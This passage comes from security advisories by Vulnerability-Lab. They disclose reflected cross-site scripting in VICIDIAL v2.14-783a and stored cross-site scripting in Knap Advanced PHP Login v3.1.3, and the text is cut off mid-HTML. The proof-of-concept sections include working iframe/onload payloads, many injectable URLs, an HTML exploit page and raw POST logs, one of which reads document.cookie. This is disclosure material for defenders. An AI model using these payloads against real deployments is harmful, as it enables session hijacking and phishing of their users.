(Security Department)<br />2022-10-11: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official VICIDIAL v2.14-783a web-application.<br />The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user session data<br />or to manipulate application contents for clients.<br /><br />The vulnerabilities are located in the `end_date`, `query_date`, `shift`, `type`, `use_lists`, `search_archived_data`, `start_hour`, `end_hour`,<br />`stage`, `agent`, `user`, `db` parameters of the vulnerable `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_user_group_hourly_detail.php`,<br />`AST_agent_time_sheet.php`, `AST_agent_days_detail.php`, `user_status.php`, `admin_lists_custom.php` and `admin.php` files. Remote attackers<br />are able to create special crafted malicious links to execute client-side script code from the application context. The request method to inject<br />is GET and the attack vector is non-persistent. The identified web vulnerabilities are classic cross site scripting issues.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to<br />malicious source and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] GET<br /><br />Vulnerable File(s):<br />[+] AST_IVRstats.php<br />[+] AST_LISTS_pass_report.php<br />[+] AST_user_group_hourly_detail.php<br />[+] AST_agent_time_sheet.php<br />[+] AST_agent_days_detail.php<br />[+] user_status.php<br />[+] admin_lists_custom.php<br />[+] admin.php<br /><br />Vulnerable Parameter(s):<br />[+] end_date<br />[+] query_date<br />[+] shift<br />[+] type<br />[+] use_lists<br />[+] search_archived_data<br />[+] start_hour<br />[+] end_hour<br />[+] stage<br />[+] agent<br />[+] user<br />[+] db<br /><br />Affected Module(s):<br />[+] Backend Administration Web UI (Agents, Managers & Admins)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: (PoC - IVR Report)<br /></td><td rowspan="2" valign="TOP"><br /><font size="2" face="ARIAL,HELVETICA" color="BLACK"> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/vicidial_demo/AST_IVRstats.php?DB=&<br />type=inbound&query_date=2022-01-16&end_date=2022-01-16&query_date_D=2022-01-16&query_date_T=<br />&end_date_D=2022-01-16&end_date_T=&shift=[MALICIOUS SCRIPT CODE EXECUTION POINT!]"><iframe src="evil.source" onload="alert(document.domain)"></iframe><br />&file_download=1&search_archived_data=">DOWNLOAD</a> | <a href="./admin.php?ADD=3111&group_id=">MODIFY</a> |<br /><a href="./admin.php?ADD=999999">REPORTS</a> | <a href="./AST_CLOSERstats.php?query_date=2022-01-16&<br />end_date=2022-01-16&shift=">[MALICIOUS SCRIPT CODE EXECUTION POINT!]<iframe src="evil.source" onload="alert(document.domain)"></iframe>">CLOSER REPORT</a><br /></font><br /></td></tr><br /><br /><br />PoC: Payload<br /><iframe src=evil.source onload=alert(document.domain)></iframe><br /><br /><br />PoC: Vulnerable Parameters<br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date[XSS]+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=[XSS]+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift[XSS]&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=[XSS]&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[XSS]&type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=<br />&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br /><br />https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=&use_lists=[XSS]&report_display_type=HTML&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/admin.php?query_date[XSS]&end_date=2022-01-04&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL<br />https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=[XSS]&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL<br />https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=16&end_hour=16&SUBMIT=&search_archived_data=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=[XSS]&end_hour=[XSS]&file_download=1&SUBMIT=&search_archived_data=<br />https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=[XSS]&agent=[XSS]&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/user_status.php?user=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=[XSS]&group[]=--ALL--&shift=ALL<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=[XSS]&end_date=2022-01-15&group[]=--ALL--&shift=ALL<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=[XSS]&shift=ALL&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data=&report_display_type=TEXT&stage=[XSS]<br />https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=[XSS]&SUBMIT=SUBMIT<br />https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente&field_type=TEXT&field_duplicate=N&DB=[XSS]<br /><br /><br /><br />PoC: Exploitation<br /><html><br /><head><body><br /><title>vicidial xss exploit</title><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&field_id=133&field_label=idcliente<br />&field_type=TEXT&field_duplicate=N&DB=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data=<br />&report_display_type=TEXT&stage=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=<iframe src=evil.source onload=alert(document.domain)></iframe>&shift=ALL&SUBMIT=SUBMIT"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-15&group[]=--ALL--&shift=ALL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&group[]=--ALL--&shift=ALL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/user_status.php?user=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=<iframe src=evil.source onload=alert(document.domain)></iframe><br />&end_hour=<iframe src=evil.source onload=alert(document.domain)></iframe>&file_download=1&SUBMIT=&search_archived_data="></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe><br />&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-04<br />&max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=<iframe src=evil.source onload=alert(document.domain)></iframe><br />&type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL<br />&report_display_type=HTML"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00<br />&end_date<iframe src=evil.source onload=alert(document.domain)></iframe>+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00<br />&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML<br />"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59<br />&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift<iframe src=evil.source onload=alert(document.domain)></iframe><br />&report_display_type=HTML"></iframe><br /><iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=<br />&type=<iframe src=evil.source onload=alert(document.domain)></iframe>&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59<br />&shift=ALL&report_display_type=HTML"></iframe><br /></body></head><br /></html><br /><br /><br />Security Risk:<br />==============<br />The security risk of the cross site scripting web vulnerabilities in the vicidial web-application are estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2307<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2307<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.7<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Knap is an advanced User Management software written in Laravel 5.4 (PHP Framework) that allows the admin to manage users.<br /><br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the Knap Advanced PHP Login v3.1.3 user management web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ajay138<br />Product: Knap Advanced PHP Login v3.1.3 - User Management (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-03: Researcher Notification & Coordination (Security Researcher)<br />2021-09-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discoveredin the Knap Advanced PHP Login v3.1.3 user management web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application<br />requests from the application-side.<br /><br />The persistent cross site web vulnerability is located in the name parameter of the Profile Account - Account Information module.<br />Remote attackers with ow privileged user accounts are able to inject own malicious script code as name to provoke an execution<br />of the malicious content inside the users and activity log backend modules. The request method to inject is post. The injection<br />points are the user create or update and the execution of the maliciou script code occurs in the activity log and users listings.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious source and persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Register (Site)<br />[+] Update (Account Information)<br /><br />Vulnerable Input(s):<br />[+] Name<br /><br />Vulnerable Parameter(s):<br />[+] name<br /><br />Affected Module(s):<br />[+] ./users<br />[+] ./activity<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Manual steps to reproduce the vulnerability ...<br />1. Register as user or get registered by the admin<br />2. Start your web browser and a session tamper or debug tools<br />3. Open the My Profile menu with the Profile Account information section<br />4. Change the name input to your script code test payload and save via submit (post)<br />Note: The injected payload executes successfully in the users list (backend) and within the activity log on history (backend) on preview by admins or mods<br />5. Successful reproduce of the persistent cross site scripting web vulnerability!<br /><br /><br />--- PoC Session Logs (POST [Inject via User Role by Profile Account Update|Create] ---<br />https://knap.froid.works/profiles/102<br />Host: knap.froid.works<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------73425417436906186553080920069<br />Content-Length: 29455<br />Origin:https://knap.froid.works<br />Connection: keep-alive<br />Referer:https://knap.froid.works/profile-edit<br />Cookie: laravel_session=eyJpdiI6Ikt4Zmd3WDVSeThObVlvbnZld1JadWc9PSIsInZhbHVlIjoiN3pubk1YaVwvaWp6aWF2QlNwb3l2T2<br />h5MzdHZjJUd0Y2em1mUXE4Q1wvZHhnbkhwUW1ZaDU3aytaWFNURk5pc1M4IiwibWFjIjoiM2UwMTg0MGQ0M2VjMDk0YTVkN2M0ZGVjOWM5NmI1NDMzYzUxODU5ZmVkNmNmZDJlMTc5ZmVlYThiNTlkODIxZCJ9<br />0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B<br />&28=e&29=8&30=T&31=X&32=0&33=F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h<br />&53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63=e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3<br />&78=C&79=i&80=m&81=g&82=%&83=3&84=E&85=%&86=3&87=E&88=%&89=2&90=2&91=%&92=3&93=C&94=i&95=f&96=r&97=a&98=m&99=e&100=+&101=s<br />&102=r&103=c&104=%&105=3&106=D&107=e&108=v&109=i&110=l&111=.&112=s&113=o&114=u&115=r&116=c&117=e&118=+&119=o&120=n&121=l&122=o<br />&123=a&124=d&125=%&126=3&127=D&128=a&129=l&130=e&131=r&132=t&133=(&134='&135=P&136=W&137=N&138=D&139='&140=)&141=%&142=3<br />&143=E&144=%&145=3&146=C&147=%&148=2&149=F&150=i&151=f&152=r&153=a&154=m&155=e&156=%&157=3&158=E&159=&&160=t&161=y&162=p&163=e&164==&165=p&166=e&167=r&168=s&169=o&170=n&171=a&172=l&173=I&174=n&175=f&176=o<br />&177=&&178=e&179=m&180=a&181=i&182=l&183==&184=f&185=t&186=p&187=%&188=4&189=0&190=l&191=i&192=v&193=e&194=.&195=c&196=o<br />&197=m&198=&&199=d&200=o&201=b&202==&203=2&204=0&205=2&206=1&207=-&208=0&209=9&210=-&211=1&212=0&213=&&214=g&215=e&216=n&217=d&218=e&219=r&220==&221=m&222=a&223=l&224=e&225=&&226=c&227=u&228=s&229=t&230=o<br />&231=m&232=_&233=f&234=i&235=e&236=l&237=d&238=s&239=_&240=d&241=a&242=t&243=a&244=%&245=5&246=B&247=u&248=r&249=b&250=_<br />&251=1&252=%&253=5&254=D&255==&256=t&257=e&258=s<br />&259=t&260=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert('PWND')></iframe>&type=personalInfo<br />&email=ftp@live.com&dob=2021-09-10&gender=male&custom_fields_data[urb_1]=teste<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.39 (Ubuntu)<br />Set-Cookie:<br />laravel_session=eyJpdiI6Ik1zbUliRHJrMjNqY2pPcDQ5aENtYVE9PSIsInZhbHVlIjoiRjVYTG9aNjJUTlwvbHJDZ2xQbUx6V1hTOFg2SnlWeTBDYW1HVHNVOEJ4bUR<br />KZ3ExMFVRcEE0bEI5OURMUm55RVciLCJtYWMiOiIzMzg2OTAyZTcyMDJmOGQ0ZWY5MWNjY2ZkZmRkOTA3NzA2NjI1NzViOWM5OWVlMzE0ZTZjMzhjMjRjMjE0N2VhIn0%3D;<br />expires=Fri, 10-Sep-2021 19:09:50 GMT; Max-Age=7200; path=/; httponly<br />Content-Length: 53<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/json<br /><br /><br /><br />--- PoC Session Logs (POST [Inject via Admin Role] ---<br />https://knap.froid.works/users/102<br />Host: knap.froid.works<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------23081715668612801831491484963<br />Content-Length: 39263<br />Origin:https://knap.froid.works<br />Connection: keep-alive<br />Referer:https://knap.froid.works/users<br />Cookie: laravel_session=eyJpdiI6IktJUUlXU21TZHZGRHdkNEczbGZwMXc9PSIsInZhbHVlIjoidlhcLzl3cU1UbHVwZFVDclhkXC9CZGdDNkh<br />XTEtlTnNmNWlWY3hwRzd3ZFNUcVI3R1plVHc1NE5tRUJoVmxobElQIiwibWFjIjoiODYyMmNiMjFlYTJjYzdkNGZkOTI2ZWQzYjg2M2U5OTA5NWI5NzVhYzExOWYzYTcwMTkyOTk1ZDMxOGRhNWE3OSJ9<br />0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B&28=e&29=8&30=T&31=X&32=0&33=<br />F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h&53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63=<br />e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3&78=C&79=i&80=f&81=r&82=a&83=m&84=e&85=%&86=3&87=E&88=%&89=3&90=E&91=%&92=2&93=<br />2&94=%&95=3&96=C&97=i&98=f&99=r&100=a&101=m&102=e&103=+&104=s&105=r&106=c&107=%&108=3&109=D&110=e&111=v&112=i&113=l&114=.&115=s&116=o&117=u&118=r&119=<br />c&120=e&121=+&122=o&123=n&124=l&125=o&126=a&127=d&128=%&129=3&130=D&131=a&132=l&133=e&134=r&135=t&136=(&137=d&138=o&139=c&140=u&141=m&142=e&143=n&144=<br />t&145=.&146=c&147=o&148=o&149=k&150=i&151=e&152=)&153=%&154=3&155=E&156=%&157=3&158=C&159=%&160=2&161=F&162=i&163=f&164=r&165=a&166=m&167=e&168=%&169=3&170=E&171=&&172=e&173=m&174=a&175=i&176=l&177==&178=f&179=e&180=l&181=i&182=x&183=d&184=i&185=r&186=%&187=4&188=0&189=l&190=i&191=v&192=<br />e&193=.&194=c&195=o&196=m&197=&&198=d&199=o&200=b&201==&202=2&203=0&204=2&205=1&206=-&207=0&208=9&209=-&210=1&211=0&212=&&213=g&214=e&215=n&216=d&217=e&218=r&219==&220=m&221=a&222=l&223=e&224=&&225=p&226=a&227=s&228=s&229=w&230=o&231=r&232=<br />d&233==&234=&&235=x&236=C&237=o&238=o&239=r&240=d&241=O&242=n&243=e&244==&245=&&246=y&247=C&248=o&249=o&250=r&251=d&252=O&253=n&254=<br />e&255==&256=&&257=p&258=r&259=o&260=f&261=i&262=l&263=e&264=I&265=m&266=a&267=g&268=e&269=W&270=i&271=d&272=t&273=h&274==&275=&&276=<br />p&277=r&278=o&279=f&280=i&281=l&282=e&283=I&284=m&285=a&286=g&287=e&288=H&289=e&290=i&291=g&292=h&293=t&294==&295=&&296=c&297=u&298=<br />s&299=t&300=o&301=m&302=_&303=f&304=i&305=e&306=l&307=d&308=s&309=_&310=d&311=a&312=t&313=a&314=%&315=5&316=B&317=u&318=r&319=b&320=_&321=1&322=%&323=5&324=D&325==&326=a&327=s&328=d&329=a&330=&&331=s&332=t&333=a&334=t&335=u&336=s&337==&338=a&339=c&340=t&341=<br />i&342=v&343=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&email=felixdir@live.com&dob=2021-09-10&gender=male&password=&image=&xCoordOne=&yCoordOne=&profileImageWidth=&profileImageHeight=&custom_fields_data[urb_1]=asda&status=active<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.39 (Ubuntu)<br />Set-Cookie:<br />laravel_session=eyJpdiI6IjdiMGZ5MHYzYklHbXpMS3FXK3ExTWc9PSIsInZhbHVlIjoid04yKzJWXC9wMzNEdVdheWJUVHNNS0c5VHQ3R2Y2OGpqY0U1a2VcLzRoM1<br />hIbzNrZDZCZk45SnhwRW5jTXhNMzNWIiwibWFjIjoiNDJmNGE3ZDgzMDU5Mzk5MjA0MzQwZWJhOGRkZTg0N2FmZWI0NGM4ZjNkZjg3M2Y1ZWNjNjQ2OTM1YTk3Y2UyOSJ9;<br />expires=Fri, 10-Sep-2021 18:52:58 GMT; Max-Age=7200; path=/; httponly<br />Content-Length: 53<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/json<br /><br /><br />Vulnerable Source: ./users (knap.deleteAlert)<br /><table class="table table-striped table-bordered table-hover table-checkable order-column dataTable no-footer" id="users" role="grid" aria-describedby="users_info" style="width: 1568px;"><br /><thead><br /><tr role="row"><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 57px;" aria-label="ID: activate to sort column ascending">ID</th><br /><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 67px;" aria-label="Avatar: activate to sort column ascending">Avatar</th><br /><th class="sorting_asc" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 120px;" aria-label="Name: activate to sort column descending"<br />aria-sort="ascending">Name</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 257px;"<br />aria-label="Email: activate to sort column ascending">Email</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1"<br />style="width: 73px;" aria-label="Gender: activate to sort column ascending">Gender</th><th class="sorting_disabled" rowspan="1" colspan="1"<br />style="width: 258px;" aria-label="Roles">Roles</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 64px;"<br />aria-label="Status: activate to sort column ascending">Status</th><th class="sorting_disabled" rowspan="1" colspan="1" style="width: 323px;" aria-label="Actions">Actions</th></tr><br /></thead><br /><tbody><br /><tr role="row" class="odd"><td>19</td><td><img src="https://www.gravatar.com/avatar/18228d88bbd04db784b489f7ad9402e0?d=mm&s=250" height="100px"></td><br /><td class="sorting_1">Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></td><td>test@test.de</td><br /><td><span id="status19" class="label bg-blue disabled color-palette"> <i class="fa fa-male"></i> male</span></td><td><ul><li>Role Dashboard</li></ul></td><td><span class="label label-sm label-success">Active</span></td><br />-<br /><a style="margin: 1px;" href="javascript:;" onclick="knap.deleteAlert('users','Are you sure you want to delete <strong>Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>?<br />This action cannot be undone.',19)" class="btn btn-sm btn-danger red"><i class="fa fa-trash"></i> Delete</a><br /><br /><br /><br />Vulnerable Source: ./activity<br /><div class="portlet light bordered"><br /><div class="portlet-title"><br /><div class="caption font-dark"><br /><i class="icon-clock"></i><br /><span class="caption-subject bold uppercase"> Activity Log </span><br /></div><br /><div class="actions"><br /></div></div><br /><div class="portlet-body"><br /><div class="table-toolbar"><br /><div class="row"><br /><div class="col-md-6"><br /></div></div></div><br /><div id="activity_wrapper" class="dataTables_wrapper no-footer"><div class="row"><div class="col-md-6 col-sm-6"><div class="dataTables_length" id="activity_length"><br /><label>Show <select name="activity_length" aria-controls="activity" class="form-control input-sm input-xsmall input-inline"><option value="10">10</option><br /><option value="15">15</option><option value="20">20</option><option value="-1">All</option></select> records</label></div></div><div class="col-md-6 col-sm-6"><br /><div id="activity_filter" class="dataTables_filter"><label>Search:<input type="search" class="form-control input-sm input-small input-inline" placeholder=""<br />aria-controls="activity"></label></div></div><div id="activity_processing" class="dataTables_processing" style="display: none;">Processing...</div></div><br /><div class="table-scrollable"><table class="table table-striped table-bordered table-hover order-column dataTable no-footer" id="activity" role="grid"<br />aria-describedby="activity_info" style="width: 1566px;"><br /><thead><br /><tr role="row"><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 61px;" aria-label="ID: activate to sort column<br />ascending">ID</th><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 1093px;" aria-label="Message: activate to sort<br />column ascending">Message</th><th class="sorting_desc" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 266px;" aria-sort="descending"<br />aria-label="Log Time: activate to sort column ascending">Log Time</th></tr><br /></thead><br /><tbody><br /><tr role="row" class="odd"><td>114</td><td>Admin updated role <strong>role-activity-log</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:03 PM</td></tr><br /><tr role="row" class="even"><td>113</td><td>Admin updated role <strong>role-activity-log"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong><br />successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:02 PM</td></tr><tr role="row" class="odd"><td>112</td><td>Admin updated user <strong>Abdul Zboncak</strong> successfully</td><br /><td class="sorting_1">Fri, Sep 10, 